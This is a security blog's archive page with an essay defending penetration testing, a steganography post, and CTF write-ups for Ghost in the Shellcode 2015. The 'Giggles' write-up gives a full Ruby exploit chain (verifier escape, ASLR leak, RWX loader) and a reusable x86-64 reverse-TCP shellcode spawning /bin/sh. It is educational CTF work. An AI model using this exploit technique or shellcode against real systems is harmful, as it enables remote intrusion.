Monthly Archives: January 2015

In Defense of Ethical Hacking

Pete Herzog, wrote an interesting piece on Dark Matters (Norse’s blog platform) a while back, and I’ve given it a few days to sink in because I didn’t want my response to be emotional. After a few days I’ve re-read the post a few more times and still have no idea where Pete, someone I otherwise is fairly sane and smart (see his bio - , gets this premise he’s writing about. In fact, it annoyed me enough that I wrote up a response to his post… and Pete, I’m confused where this point of view comes from! I’d genuinely like to know… I’ll reach out and see if we can figure it out.

— For the sake of this blog post, I consider ethical hacking and penetration testing to effectively be the same thing. I know not everyone agrees, and that’s unfortunate, but I guess you can’t please everyone.

So here on my comments on Pete’s blog post titled “The Myth of Ethical Hacking (”

I thought reacting is what you did when you weren’t secure. And I thought ethical hacking was proactive, showing you could take advantage of opportunities left by the stupid people who did the security.
— Boy am I glad he doesn’t think this way anymore. Reacting is part of life, but it’s not done because you’re insecure, it’s done because business and technology along with your adversaries is dynamic. It’s like standing outside without an umbrella. It’s not raining… but if you stand there long enough you’ll need an umbrella. It’s not that you are stupid, it’s that weather changes. If you’re in Chicago, like I am, this happens about every 2.7 seconds.
I also thought ethical hacking and security testing were the same thing, because while security testing focused on making sure all security controls were there and working right and ethical hacking focused on showing a criminal could penetrate existing security controls, both were about proactively learning what needed to be better secured.
— That’s an interesting distinction. I can’t say I believe this is any more than a simple different in word choice. Isn’t this all about validation of the security an organization thinks they have, versus the reality of how attackers act and what they will target? I guess I could be wrong, but these terms: vulnerability testing, penetration testing, ethical hacking, security testing — they create confusion in the people trying to consume these services, understand security, and hire. Do they have any real value? I this this is one reason standards efforts by people in the security testing space were started, to demystify, de-obfuscate, and lessen confusion. Clearly it’s not working as intended?
Ethical hacking, penetration testing, and red-teaming are still considered valid ways to improve security posture despite that they test the tester as much, if not more, than the infrastructure.
— Now, here’s a statement that I largely agree with. It’s not controversial anymore to say this. This is why things like the PTES (Penetration Testing Execution Standard) were born. Taking a look at the people who are behind this, standard you can easily see that it’s not just another shot in the dark or empty effort - Standardizing how a penetration test (or ethical hack, these should be the same thing in my mind). Let me address red teaming for a minute too. Red Team exercises are not the same thing as penetration testing and ethical hacking — not really — it’s like the difference between asking someone if they can pick the lock on the front door, versus daring someone to break into your house and steal your passport without reservation. Red Teaming is a more aggressive approach. I’ve heard some call Red Team exercises “closer to what an actual attacker would behave like”, your mileage may vary on that one. Bottom line, though, you always get the quality you ask for (pay for). If you are willing to pay for high-grade talent, generally speaking you’ll get high grade talent. If you’re looking for a cheap penetration test your results will likely be vastly different because the resources on the job may not be as senior or knowledgeable. The other thing here is this — not all penetration testers are experts in all technologies at your shop. Keep this in mind. Some folks are magicians with a Linux/Unix system, while others have grown their expertise in the Windows world. Some are web application experts, some are infrastructure experts, and some are generalists. The bottom line is that this is both true, something that should be accounted for, and largely not the fault of the tester.
Then again nearly everything has a positive side we can see if we squint. And as a practical, shake-the-CEO-into-awareness technique, criminal hacking simulations should be good for fostering change in a security posture.
— I read this and wonder to myself… if the CEO hasn’t already been “shaken into awareness” through headlines in the papers and nightly news, then there is something else going on here that a successful ethical hack ransack of the enterprise likely won’t solve.
So somehow, ethical hackers with their penetration testing and red-teaming, despite any flaws, have taken on this status of better security than, say, vulnerability scanning. Because there’s a human behind it? Is it artisan, and thus we pay more?
— Wait, what?! If you see these two as equal, then you’ve either done a horrible job at picking your ethical hacker/penetration testers, or you don’t understand what you’re saying. As someone who spent a few years demonstrating to companies that web application security tools were critical to their success, I’ve never, ever said they can replace a human tester. Ever. To answer the question directly — YES, because there’s a human behind it, this is an entirely different thing. See above about quality of penetration tester, but the point stands.
It also has a fatal flaw: It tests for known vulnerabilities. However, in great marketing moves of the world volume 1, that is exactly how they promote it. That’s why companies buy it. But if an ethical hacker markets that they test only for known vulnerabilities, we say they suck.
— Oh, I think I see what’s going on here. The author is confusing vulnerability assessment with penetration testing, maybe. That’s the only logical explanation I can think of. Penetration testers have a massive advantage over scanning tools because of this wonderful thing called the human intellect. They can see and interpret errors that systems kick back. Because tools look for patterns, and respond accordingly, there are times where a human can see an error message and understand what it’s implying, but the machine has no such ability. In spite of all of technology’s advancements, tools are still using regular expressions and some rudimentary if-then clauses for pattern recognition. Machines, and by that way software, do not think. This gives software a disadvantage over a human 100% of the time.
Now vulnerability scanning is indeed reactive. We wait for known flaws to be known, scan for them, and we then react to that finding by fixing it. Ethical hacking is indeed proactive. But not because it gives the defender omniscient threat awareness, but rather so we can know all the ways where someone can break in. Then we can watch for it or even fix it.
— I’m going to ignore the whole reactive vs proactive debate here. I don’t believe it’s productive to the post here, and I think many people don’t understand what these terms mean in security anyway. First, you’ll never, ever know “all the ways someone can break in”, ever. Never. That’s the beauty of the human mind. Human beings are a creative bunch, and when properly incentivized, we will find a way once we’ve exhausted all the known ways. However, there’s a little caveat here, which is not talked about enough I don’t believe. The reason we won’t ever know all the ways someone can break in, even if we give humans the ability to find all the ways — is this thing called scope, and time. Penetration testers, ethical hackers and whatever you want to call them are time-boxed. Rarely do you get an open-ended contract, or even in the case of an internal resource, the ability to dedicate all the time you have to the task of finding ways to break in. Furthermore, there are many, many, many ways to break in typically. Systems can be mis-configured, un-patched, and left exposed in a million different ways. And even if you did have all the time you needed, these systems are dynamic and are going to change on you at some point, unless you work in one of "those" organizations, and if so then you’ve got bigger problems.
But does it really work that way? Isn’t what passes for ethical hacking too often just running vulnerability scanners to find the low hanging fruit and exploit that to prove a criminal could get in? Isn’t that really just finding known vulnerabilities like a vulnerability scanner does, but with a little verification thrown in?
— And here it is. Let me answer this question from the many, many people I know who do actual ethical hacking/penetration testing: no. Also if you find this to be actually true in your experience, you’re getting the wrong penetration testers. Maybe fire your provider or staff.
There’s this myth that ethical hackers will make better security by breaking through existing security in complicated, sometimes clever ways that point out the glaring flaw(s) of the moment for remediation.
— Talk to someone who does serious penetration testing for a living, or manages one of these teams. Many of them have a store of clever, custom code up their sleeves but rarely have to use it because the systems they test have so much broken on them that dropping custom code isn’t even remotely necessary.
But we know that all too often it’s just vulnerability scanning with scare tactics.
—Again, you’re dealing with some seriously amateur, bad people or providers. Fire them.
And when there’s no way in, they play the social engineering card.
— a) I don’t see the issue with this approach, b) there’s a 99.9% chance there is a way in without “playing the social engineering card”.
One of the selling points of ethical hacking is the skilled use of social engineering. Let me save you some money: It works.
— Yes, 90%+ of the time, even when the social engineer isn’t particularly skilled, it works. Why? Human nature. Also employees that don’t know better. So what if it works though, you still need to leverage that testing to show real-use-cases of how your defenses were easily penetrated for educational purposes. Record it. Highlight those employees who let that guy with the 4 coffee cups in his hands through the turnstile without asking for a badge…but do it constructively so that they and their peers will remember. Testing should drive awareness, and real-life use cases are priceless.
So if ethical hacking as it’s done is a myth…
— Let me stop you right there. It’s not, you’ve just had some terrible experiences I don’t believe are indicative of the wider industry. So since the rest of the article is based on this, I think we’re done here.

Plausible Deniability – The Impact of Crypto Law

So, after the recent terror attacks in Paris, the UK suffered from the usual knee-jerk reactions from the technologically-challenged chaps we have governing us. “Let’s ban encryption the Government can’t crack”, they say. Many people mocked this, saying that terrorists were flouting laws anyway, so why would they obey the rules on crypto? How would companies that rely on crypto do business in the UK (that’s everyone, by the way)?

Well, I’m not going to dwell on those points, because I am rather late to the party in writing this piece, and because those points are boring :) In any case, if the Internet went all plaintext on us, web filtering would be a whole lot easier, and Smoothwall’s HTTPS features wouldn’t be quite so popular!

If the real intent of the law is to be able to arrest someone just for having, or sending encrypted data - the equivalent of arresting someone for looking funny (or stepping on the cracks in pavements). What would our miscreants do next?

Well, the idea we need to explore is “plausible deniability”. For example, you are a De Niro-esque mafia enforcer. You need to carry a baseball bat, for the commission of your illicit  work. If you want to be able to fool the local law enforcement, you might also carry a baseball. “i’m going to play baseball, officer” (may not go down well at 3 in the morning when you have a corpse in the back seat of your car, but it’s a start). You conceal your weapon among things that help it look normal. It is possible conceal the cryptography “weapon” so that law enforcement can’t see it’s there so they can’t arrest anyone. Is it possible to say “sorry officer, no AES256 here, just a picture of a kitteh”? If so, you have plausible deniability.

What’s the crypto equivalent? Steganography. The idea of hiding a message inside other data, such that it is very hard to prove a hidden message is there at all. Here’s an example:

This image of a slightly irritated looking cat in a shoebox contains a short message. It will be very hard to find, because the original image is only on my harddisk, so you have nothing to compare to. There are many steganographic methods for hiding the text, and it is extremely short by comparison to the image. If I had encrypted the text… well, you would find it even harder, because you couldn’t even look for words. It is left as an exercise for the reader to tell me in a comment what the message is.

GitS 2015: Giggles (off-by-one virtual machine)

Welcome to part 3 of my Ghost in the Shellcode writeup! Sorry for the delay, I actually just moved to Seattle. On a sidenote, if there are any Seattle hackers out there reading this, hit me up and let's get a drink!

Now, down to business: this writeup is about one of the Pwnage 300 levels; specifically, Giggles, which implements a very simple and very vulnerable virtual machine. You can download the binary here, the source code here (with my comments - I put XXX near most of the vulnerabilities and bad practices I noticed), and my exploit here.

One really cool aspect of this level was that they gave source code, a binary with symbols, and even a client (that's the last time I'll mention their client, since I dislike Python :) )! That means we could focus on exploitation and not reversing!

The virtual machine

I'll start by explaining how the virtual machine actually works. If you worked on this level yourself, or you don't care about the background, you can just skip over this section.

Basically, there are three operations: TYPE_ADDFUNC, TYPE_VERIFY, and TYPE_RUNFUNC.

The usual process is that the user adds a function using TYPE_ADDFUNC, which is made up of one (possibly zero?) or more operations. Then the user verifies the function, which checks for bounds violations and stuff like that. Then if that succeeds, the user can run the function. The function can take up to 10 arguments and output as much as it wants.

There are only seven different opcodes (types of operations), and one of the tricky parts is that none of them deal with absolute values—only other registers. They are:

  • OP_ADD reg1, reg2 - add two registers together, and store the result in reg1
  • OP_BR <addr> - branch (jump) to a particular instruction - the granularity of these jumps is actually per-instruction, not per-byte, so you can't jump into the middle of another instruction, which ruined my initial instinct :(
  • OP_BEQ <addr> <reg1> <reg2> / OP_BGT <addr> <reg1> <reg2> - branch if equal and branch if greater than are basically the same as OP_BR, except the jumps are conditional
  • OP_MOV <reg1> <reg2< - set reg1 to equal reg2
  • OP_OUT <reg> - output a register (gets returned as a hex value by RUNFUNC)
  • OP_EXIT - terminate the function

To expand on the output just a bit - the program maintains the output in a buffer that's basically a series of space-separated hex values. At the end of the program (when it either terminates or OP_EXIT is called), it's sent back to the client. I was initially worried that I would have to craft some hex-with-spaces shellcode, but thankfully that wasn't necessary. :)

There are 10 different registers that can be accessed. Each one is 32 bits. The operand values, however, are all 64-bit values.

The verification process basically ensures that the registers and the addresses are mostly sane. Once it's been validated, a flag is switched and the function can be called. If you call the function before verifying it, it'll fail immediately. If you can use arbitrary bytecode instructions, you'd be able to address register 1000000, say, and read/write elsewhere in memory. They wanted to prevent that.

Speaking of the vulnerability, the bug that leads to full code execution is in the verify function - can you find it before I tell you?

The final thing to mention is arguments: when you call TYPE_RUNFUNC, you can pass up to I think 10 arguments, which are 32-bit values that are placed in the first 8 registers.

Fixing the binary

I've gotten pretty efficient at patching binaries for CTFs! I've talked about this before, so I'll just mention what I do briefly.

I do these things immediately, before I even start working on the challenge:

  • Replace the call to alarm() with NOPs
  • Replace the call to fork() with "xor eax, eax", followed by NOPs
  • Replace the call to drop_privs() with NOPs
  • (if I can find it)

That way, the process won't be killed after a timeout, and I can debug it without worrying about child processes holding onto ports and other irritations. NOPing out drop_privs() means I don't have to worry about adding a user or running it as root or creating a folder for it. If you look at the objdump outputs diffed, here's what it looks like:

--- a   2015-01-27 13:30:29.000000000 -0800
+++ b   2015-01-27 13:30:31.000000000 -0800
@@ -1,5 +1,5 @@

-giggles:     file format elf64-x86-64
+giggles-fixed:     file format elf64-x86-64

 Disassembly of section .interp:
@@ -1366,7 +1366,10 @@
     125b:      83 7d f4 ff             cmp    DWORD PTR [rbp-0xc],0xffffffff
     125f:      75 02                   jne    1263 <loop+0x3d>
     1261:      eb 68                   jmp    12cb <loop+0xa5>
-    1263:      e8 b8 fc ff ff          call   f20 <fork@plt>
+    1263:      31 c0                   xor    eax,eax
+    1265:      90                      nop
+    1266:      90                      nop
+    1267:      90                      nop
     1268:      89 45 f8                mov    DWORD PTR [rbp-0x8],eax
     126b:      83 7d f8 ff             cmp    DWORD PTR [rbp-0x8],0xffffffff
     126f:      75 02                   jne    1273 <loop+0x4d>
@@ -1374,14 +1377,26 @@
     1273:      83 7d f8 00             cmp    DWORD PTR [rbp-0x8],0x0
     1277:      75 48                   jne    12c1 <loop+0x9b>
     1279:      bf 1e 00 00 00          mov    edi,0x1e
-    127e:      e8 6d fb ff ff          call   df0 <alarm@plt>
+    127e:      90                      nop
+    127f:      90                      nop
+    1280:      90                      nop
+    1281:      90                      nop
+    1282:      90                      nop
     1283:      48 8d 05 b6 1e 20 00    lea    rax,[rip+0x201eb6]        # 203140 <USER>
     128a:      48 8b 00                mov    rax,QWORD PTR [rax]
     128d:      48 89 c7                mov    rdi,rax
-    1290:      e8 43 00 00 00          call   12d8 <drop_privs_user>
+    1290:      90                      nop
+    1291:      90                      nop
+    1292:      90                      nop
+    1293:      90                      nop
+    1294:      90                      nop
     1295:      8b 45 ec                mov    eax,DWORD PTR [rbp-0x14]
     1298:      89 c7                   mov    edi,eax

I just use a simple hex editor on Windows, xvi32.exe, to take care of that. But you can do it in countless other ways, obviously.

What's wrong with verifyBytecode()?

Have you found the vulnerability yet?

I'll give you a hint: look at the comparison operators in this function:

int verifyBytecode(struct operation * bytecode, unsigned int n_ops)
    unsigned int i;
    for (i = 0; i < n_ops; i++)
        switch (bytecode[i].opcode)
            case OP_MOV:
            case OP_ADD:
                if (bytecode[i].operand1 > NUM_REGISTERS)
                    return 0;
                else if (bytecode[i].operand2 > NUM_REGISTERS)
                    return 0;
            case OP_OUT:
                if (bytecode[i].operand1 > NUM_REGISTERS)
                    return 0;
            case OP_BR:
                if (bytecode[i].operand1 > n_ops)
                    return 0;
            case OP_BEQ:
            case OP_BGT:
                if (bytecode[i].operand2 > NUM_REGISTERS)
                    return 0;
                else if (bytecode[i].operand3 > NUM_REGISTERS)
                    return 0;
                else if (bytecode[i].operand1 > n_ops)
                    return 0;
            case OP_EXIT:
                return 0;
    return 1;

Notice how it checks every operation? It checks if the index is greater than the maximum value. That's an off-by-one error. Oops!

Information leak

There are actually a lot of small issues in this code. The first good one I noticed was actually that you can output one extra register. Here's what I mean (grab my exploit if you want to understand the API):

def demo()
  s =, PORT)

  ops = []
  ops << create_op(OP_OUT, 10)
  add(s, ops)
  verify(s, 0)
  result = execute(s, 0, [])

  pp result

The output of that operation is:
"42fd35d8 "

Which, it turns out, is a memory address that's right after a "call" function. A return address!? Can it be this easy!?

It turns out that, no, it's not that easy. While I can read / write to that address, effectively bypasing ASLR, it turned out to be some left-over memory from an old call. I didn't even end up using that leak, either, I found a better one!

The actual vulnerabilitiy

After finding the off-by-one bug that let me read an extra register, I didn't really think much more about it. Later on, I came back to the verifyBytecode() function and noticed that the BR/BEQ/BGT instructions have the exact same bug! You can branch to the last instruction + 1, where it keeps running unverified memory as if it's bytecode!

What comes after the last instruction in memory? Well, it turns out to be a whole bunch of zeroes (00 00 00 00...), then other functions you've added, verified or otherwise. An instruction is 26 bytes long in memory (two bytes for the opcode, and three 64-bit operands), and the instruction "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" actually maps to "add reg0, reg0", which is nice and safe to do over and over again (although it does screw up the value in reg0).

Aligning the interpreter

At this point, it got a bit complicated. Sure, I'd found a way to break out of the sandbox to run unverified code, but it's not as straight forward as you might think.

The problem? The spacing of the different "functions" in memory (that is, groups of operations) aren't multiples of 26 bytes apart, thanks to headers, so if you break out of one function and into another, you wind up trying to execute bytecode that's somewhat offset.

In other words, if your second function starts at address 0, the interpreter tries to run the bytecode at -12 (give or take). The bytecode at -12 just happens to be the number of instructions in the function, so the first opcode is actually equal to the number of operations (so if you have three operations in the function, the first operation will be opcode 3, or BEQ). Its operands are bits and pieces of the opcodes and operands. Basically, it's a big mess.

To get this working, I wanted to basically just skip over that function altogether and run the third function (which would hopefully be a little better aligned). Basically, I wanted the function to do nothing dangerous, then continue on to the third function.

Here's the code I ended up writing (sorry the formatting isn't great, check out the exploit I linked above to see it better):

# This creates a valid-looking bytecode function that jumps out of bounds,
# then a non-validated function that puts us in a more usable bytecode
# escape
def init()
  puts("[*] Connecting to #{SERVER}:#{PORT}")
  s =, PORT)
  #puts("[*] Connected!")

  ops = []

  # This branches to the second instruction - which doesn't exist
  ops << create_op(OP_BR, 1)
  add(s, ops)
  verify(s, 0)

  # This little section takes some explaining. Basically, we've escaped the bytecode
  # interpreter, but we aren't aligned properly. As a result, it's really irritating
  # to write bytecode (for example, the code of the first operation is equal to the
  # number of operations!)
  # Because there are 4 opcodes below, it performs opcode 4, which is 'mov'. I ensure
  # that both operands are 0, so it does 'mov reg0, reg0'.
  # After that, the next one is a branch (opcode 1) to offset 3, which effectively
  # jumps past the end and continues on to the third set of bytecode, which is out
  # ultimate payload.

  ops = []
  # (operand = count)
  #                  |--|               |---|                                          <-- inst1 operand1 (0 = reg0)
  #                          |--------|                    |----|                      <-- inst1 operand2 (0 = reg0)
  #                                                                        |--|        <-- inst2 opcode (1 = br)
  #                                                                  |----|            <-- inst2 operand1
  ops << create_op(0x0000, 0x0000000000000000, 0x4242424242000000, 0x00003d0001434343)
  #                  |--|              |----|                                          <-- inst2 operand1
  ops << create_op(0x0000, 0x4444444444000000, 0x4545454545454545, 0x4646464646464646)
  # The values of these don't matter, as long as we still have 4 instructions
  ops << create_op(0xBBBB, 0x4747474747474747, 0x4848484848484848, 0x4949494949494949)
  ops << create_op(0xCCCC, 0x4a4a4a4a4a4a4a4a, 0x4b4b4b4b4b4b4b4b, 0x4c4c4c4c4c4c4c4c)

  # Add them
  add(s, ops)

  return s

The comments explain it pretty well, but I'll explain it again. :)

The first opcode in the unverified function is, as I mentioned, equal to the number of operations. We create a function with 4 operations, which makes it a MOV instruction. Performing a MOV is pretty safe, especially since reg0 is already screwed up.

The two operands to instruction 1 are parts of the opcodes and operands of the first function. And the opcode for the second instruction is part of third operand in the first operation we create. Super confusing!

Effectively, this ends up running:

mov reg0, reg0
br 0x3d
; [bad instructions that get skipped]

I'm honestly not sure why I chose 0x3d as the jump distance, I suspect it's just a number that I was testing with that happened to work. The instructions after the BR don't matter, so I just fill them in with garbage that's easy to recognize in a debugger.

So basically, this function just does nothing, effectively, which is exactly what I wanted.

Getting back in sync

I hoped that the third function would run perfectly, but because of math, it still doesn't. However, the operation count no longer matters in the third function, which is good enough for me! After doing some experiments, I determined that the instructions are unaligned by 0x10 (16) bytes. If you pad the start with 0x10 bytes then add instructions as normal, they'll run completely unverified.

To build the opcodes for the third function, I added a parameter to the add() function that lets you offset things:

  # We have to cleanly exit
  ops << create_op(OP_EXIT)

  # Add the list of ops, offset by 10 (that's how the math worked out)
  add(s, ops, 16)

Now you can run entirely unverified bytecode instructions! That means full read/write/execute of arbitrary addresses relative to the base address of the registers array. That's awesome! Because the registers array is on the stack, we have read/write access relative to a stack address. That means you can trivially read/write the return address and leak addresses of the binary, libc, or anything you want. ASLR bypass and RIP control instantly!

Leaking addresses

There are two separate sets of addresses that need to be leaked. It turns out that even though ASLR is enabled, the addresses don't actually randomize between different connections, so I can leak addresses, reconnect, leak more addresses, reconnect, and run the exploit. It's not the cleanest way to solve the level, but it worked! If this didn't work, I could have written a simple multiplexer bytecode function that does all these things using the same function.

I mentioned I can trivially leak the binary address and a stack address. Here's how:

# This function leaks two addresses: a stack address and the address of
# the binary image (basically, defeating ASLR)
def leak_addresses()
  puts("[*] Bypassing ASLR by leaking stack/binary addresses")
  s = init()

  # There's a stack address at offsets 24/25
  ops = []
  ops << create_op(OP_OUT, 24)
  ops << create_op(OP_OUT, 25)

  # 26/27 is the return address, we'll use it later as well!
  ops << create_op(OP_OUT, 26)
  ops << create_op(OP_OUT, 27)

  # We have to cleanly exit
  ops << create_op(OP_EXIT)

  # Add the list of ops, offset by 10 (that's how the math worked out)
  add(s, ops, 16)

  # Run the code
  result = execute(s, 0, [])

  # The result is a space-delimited array of hex values, convert it to
  # an array of integers
  a = result.split(/ /).map { |str| str.to_i(16) }

  # Read the two values in and do the math to calculate them
  @@registers = ((a[1] << 32) | (a[0])) - 0xc0
  @@base_addr = ((a[3] << 32) | (a[2])) - 0x1efd

  # User output
  puts("[*] Found the base address of the register array: 0x#{@@registers.to_s(16)}")
  puts("[*] Found the base address of the binary: 0x#{@@base_addr.to_s(16)}")


Basically, we output registers 24, 25, 26, and 27. Since the OUT function is 4 bytes, you have to call OUT twice to leak a 64-bit address.

Registers 24 and 25 are an address on the stack. The address is 0xc0 bytes above the address of the registers variable (which is the base address of our overflow, and therefore needed for calculating offsets), so we subtract that. I determined the 0xc0 value using a debugger.

Registers 26 and 27 are the return address of the current function, which happens to be 0x1efd bytes into the binary (determined with IDA). So we subtract that value from the result and get the base address of the binary.

I also found a way to leak a libc address here, but since I never got a copy of libc I didn't bother keeping that code around.

Now that we have the base address of the binary and the address of the registers, we can use the OUT and MOV operations, plus a little bit of math, to read and write anywhere in memory.

Quick aside: getting enough sleep

You may not know this, but I work through CTF challenges very slowly. I like to understand every aspect of everything, so I don't rush. My secret is, I can work tirelessly at these challenges until they're complete. But I'll never win a race.

I got to this point at around midnight, after working nearly 10 hours on this challenge. Most CTFers will wonder why it took 10 hours to get here, so I'll explain again: I work slowly. :)

The problem is, I forgot one very important fact: that the operands to each operation are all 64-bit values, even though the arguments and registers themselves are 32-bit. That means we can calculate an address from the register array to anywhere in memory. I thought they were 32 bit, however, and since the process is 64-bit Ii'd be able to read/write the stack, but not addresses the binary! That wasn't true, I could write anywhere, but I didn't know that. So I was trying a bunch of crazy stack stuff to get it working, but ultimately failed.

At around 2am I gave up and played video games for an hour, then finished the book I was reading. I went to bed about 3:30am, still thinking about the problem. Laying in bed about 4am, it clicked in that register numbers could be 64-bit, so I got up and finished it up for about 7am. :)

The moral of this story is: sometimes it pays to get some rest when you're struggling with a problem!

+rwx memory!?

The authors of the challenge must have been feeling extremely generous: they gave us a segment of memory that's readable, writeable, and executable! You can write code to it then run it! Here's where it's declared:

void * JIT;     // TODO: add code to JIT functions


    /* Map 4096 bytes of executable memory */

A pointer to the memory is stored in a global variable. Since we have the ability to read an arbitrary address—once I realized my 64-bit problem—it was pretty easy to read the pointer:

def leak_rwx_address()
  puts("[*] Attempting to leak the address of the mmap()'d +rwx memory...")
  s = init()

  # This offset is always constant, from the binary
  jit_ptr = @@base_addr + 0x20f5c0

  # Read both halves of the address - the read is relative to the stack-
  # based register array, and has a granularity of 4, hence the math
  # I'm doing here
  ops = []
  ops << create_op(OP_OUT, (jit_ptr - @@registers) / 4)
  ops << create_op(OP_OUT, ((jit_ptr + 4) - @@registers) / 4)
  ops << create_op(OP_EXIT)
  add(s, ops, 16)
  result = execute(s, 0, [])

  # Convert the result from a space-delimited hex list to an integer array
  a = result.split(/ /).map { |str| str.to_i(16) }

  # Read the address
  @@rwx_addr = ((a[1] << 32) | (a[0]))

  # User output
  puts("[*] Found the +rwx memory: 0x#{@@rwx_addr.to_s(16)}")


Basically, we know the pointer to the JIT code is at the base_addr + 0x20f5c0 (determined with IDA). So we do some math with that address and the base address of the registers array (dividing by 4 because that's the width of each register).

Finishing up

Now that we can run arbitrary bytecode instructions, we can read, write, and execute any address. But there was one more problem: getting the code into the JIT memory.

It seems pretty straight forward, since we can write to arbitrary memory, but there's a problem: you don't have any absolute values in the assembly language, which means I can't directly write a bunch of values to memory. What I could do, however, is write values from registers to memory, and I can set the registers by passing in arguments.

BUT, reg0 gets messed up and two registers are wasted because I have to use them to overwrite the return address. That means I have 7 32-bit registers that I can use.

What you're probably thinking is that I can implement a multiplexer in their assembly language. I could have some operands like "write this dword to this memory address" and build up the shellcode by calling the function multiple times with multiple arguments.

If you're thinking that, then you're sharper than I was at 7am with no sleep! I decided that the best way was to write a shellcode loader in 24 bytes. I actually love writing short, custom-purpose shellcode, there's something satisfying about it. :)

Here's my loader shellcode:

  # Create some loader shellcode. I'm not proud of this - it was 7am, and I hadn't
  # slept yet. I immediately realized after getting some sleep that there was a
  # way easier way to do this...
  params =
    # param0 gets overwritten, just store crap there
    "\x41\x41\x41\x41" +

    # param1 + param2 are the return address
    [@@rwx_addr & 0x00000000FFFFFFFF, @@rwx_addr >> 32].pack("II") +

    # ** Now, we build up to 24 bytes of shellcode that'll load the actual shellcode

    # Decrease ECX to a reasonable number (somewhere between 200 and 10000, doesn't matter)
    "\xC1\xE9\x10" +  # shr ecx, 10

    # This is where the shellcode is read from - to save a couple bytes (an absolute move is 10
    # bytes long!), I use r12, which is in the same image and can be reached with a 4-byte add
    "\x49\x8D\xB4\x24\x88\x2B\x20\x00" + # lea rsi,[r12+0x202b88]

    # There is where the shellcode is copied to - immediately after this shellcode
    "\x48\xBF" + [@@rwx_addr + 24].pack("Q") + # mov rdi, @@rwx_addr + 24

    # And finally, this moves the bytes over
    "\xf3\xa4" # rep movsb

  # Pad the shellcode with NOP bytes so it can be used as an array of ints
  while((params.length % 4) != 0)
    params += "\x90"

  # Convert the shellcode to an array of ints
  params = params.unpack("I*")

Basically, the first three arguments are wasted (the first gets messed up and the next two are the return address). Then we set up a call to "rep movsb", with rsi, rdi, and rcx set appropriately (and complicatedly). You can see how I did that in the comments. All told, it's 23 bytes of machine code.

It took me a lot of time to get that working, though! Squeezing out every single byte! It basically copies the code from the next bytecode function (whose address I can calculate based on r12) to the address immediately after itself in the +RWX memory (which I can leak beforehand).

This code is written to the +RWX memory using these operations:

  ops = []

  # Overwrite teh reteurn address with the first two operations
  ops << create_op(OP_MOV, 26, 1)
  ops << create_op(OP_MOV, 27, 2)

  # This next bunch copies shellcode from the arguments into the +rwx memory
  ops << create_op(OP_MOV, ((@@rwx_addr + 0) - @@registers) / 4, 3)
  ops << create_op(OP_MOV, ((@@rwx_addr + 4) - @@registers) / 4, 4)
  ops << create_op(OP_MOV, ((@@rwx_addr + 8) - @@registers) / 4, 5)
  ops << create_op(OP_MOV, ((@@rwx_addr + 12) - @@registers) / 4, 6)
  ops << create_op(OP_MOV, ((@@rwx_addr + 16) - @@registers) / 4, 7)
  ops << create_op(OP_MOV, ((@@rwx_addr + 20) - @@registers) / 4, 8)
  ops << create_op(OP_MOV, ((@@rwx_addr + 24) - @@registers) / 4, 9)

Then I just convert the shellcode into a bunch of bytecode operators / operands, which will be the entirity of the fourth bytecode function (I'm proud to say that this code worked on the first try):

  # Pad the shellcode to the proper length
  shellcode = SHELLCODE
  while((shellcode.length % 26) != 0)
    shellcode += "\xCC"

  # Now we create a new function, which simply stores the actual shellcode.
  # Because this is a known offset, we can copy it to the +rwx memory with
  # a loader
  ops = []

  # Break the shellcode into 26-byte chunks (the size of an operation)
  shellcode.chars.each_slice(26) do |slice|
    # Make the character array into a string
    slice = slice.join

    # Split it into the right proportions
    a, b, c, d = slice.unpack("SQQQ")

    # Add them as a new operation
    ops << create_op(a, b, c, d)

  # Add the operations to a new function (no offset, since we just need to
  # get it stored, not run as bytecode)
  add(s, ops, 16)

And, for good measure, here's my 64-bit connect-back shellcode:

# Port 17476, chosen so I don't have to think about endianness at 7am at night :)
REVERSE_PORT = "\x44\x44"


# Simple reverse-tcp shellcode I always use
SHELLCODE = "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a" +
"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0" +
"\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24" +
"\x02" + REVERSE_PORT + "\xc7\x44\x24\x04" + REVERSE_ADDR + "\x48\x89\xe6\x6a\x10" +
"\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48" +
"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" +
"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" +

It's slightly modified from some code I found online. I'm mostly just including it so I can find it again next time I need it. :)


To summarize everything...

There was an off-by-one vulnerability in the verifyBytecode() function. I used that to break out of the sandbox and run unverified bytecode.

That bytecode allowed me to read/write/execute arbitrary memory. I used it to leak the base address of the binary, the base address of the register array (where my reads/writes are relative to), and the address of some +RWX memory.

I copied loader code into that +RWX memory, then ran it. It copied the next bytecode function, as actual machine code, to the +RWX memory.

Then I got a shell.

Hope that was useful!

GitS 2015: aart.php (race condition)

Welcome to my second writeup for Ghost in the Shellcode 2015! This writeup is for the one and only Web level, "aart" (download it). I wanted to do a writeup for this one specifically because, even though the level isn't super exciting, the solution was actually a pretty obscure vulnerability type that you don't generally see in CTFs: a race condition!

But we'll get to that after, first I want to talk about a wrong path that I spent a lot of time on. :)

The wrong path

If you aren't interested in the trial-and-error process, you can skip this section—don't worry, you won't miss anything useful.

I like to think of myself as being pretty good at Web stuff. I mean, it's a large part of my job and career. So when I couldn't immediately find the vulnerability on a small PHP app, I felt like a bit of an idiot.

I immediately noticed a complete lack of cross-site scripting and cross-site request forgery protections, but those don't lead to code execution so I needed something more. I also immediately noticed an auth bypass vulnerability, where the server would tell you the password for a chosen user if you simply try to log in and type the password incorrectly. I also quickly noticed that you could create multiple accounts with the same name! But none of that was ultimately helpful (except the multiple accounts, actually).

Eventually, while scanning code over and over, I noticed this interesting construct in vote.php:

if($type === "up"){
        $sql = "UPDATE art SET karma=karma+1 where id='$id';";
} elseif($type === "down"){
        $sql = "UPDATE art SET karma=karma-1 where id='$id';";

mysqli_query($conn, $sql);

mysqli_query($conn, $sql);

Before that block, $sql wasn't initialized. The block doesn't necessarily initialize it before it's used. That led me to an obvious conclusion: register_globals (aka, "remote administration for Joomla")!

